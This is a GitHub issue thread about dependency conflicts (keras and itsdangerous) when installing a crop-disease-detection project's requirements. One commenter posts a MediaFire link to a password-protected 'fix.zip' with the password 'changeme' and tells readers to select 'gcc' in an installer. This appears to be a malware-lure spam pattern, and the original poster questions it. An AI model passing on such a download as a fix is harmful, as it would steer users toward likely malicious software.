### ISSUE TITLE
Module installation error 

### ISSUE THREAD

**Issue by rakeshdeep** [Mudassiruddin7/Crop-Disease-Detection#1]
### Dependency Conflict Issues in `requirements.txt`

I'm encountering several dependency conflicts when trying to install packages from the `requirements.txt` file. Specifically, it seems that many of the package versions specified are causing errors during installation.

**Steps Taken:**
1. Attempted to install all packages with the specified versions.
2. Removed version constraints and manually installed the modules, but some errors still persist.

Here’s a screenshot of the error message for reference:

![Dependency Error](https://github.com/user-attachments/assets/cdd0b4b9-6c48-4261-b91e-58ab57576ad7)

**Key Issues:**
- `keras==2.2.4`  `itsdangerous==1.1.0` conflicts with, which requires `itsdangerous>=2.1.2`.
- The installation process fails due to these conflicting dependencies.

**Suggestions:**
- Consider updating the `requirements.txt` to specify compatible versions of `itsdangerous` and other modules.
- Alternatively, loosen the version constraints to allow `pip` to resolve the dependencies automatically.

Please let me know if you need any more information or if there's a recommended fix for this issue. Thanks!

**Comment by rakeshdeep** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

why this

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mudassiruddin7** [comment]
Once go through with the files and lmk if you faced any problems.
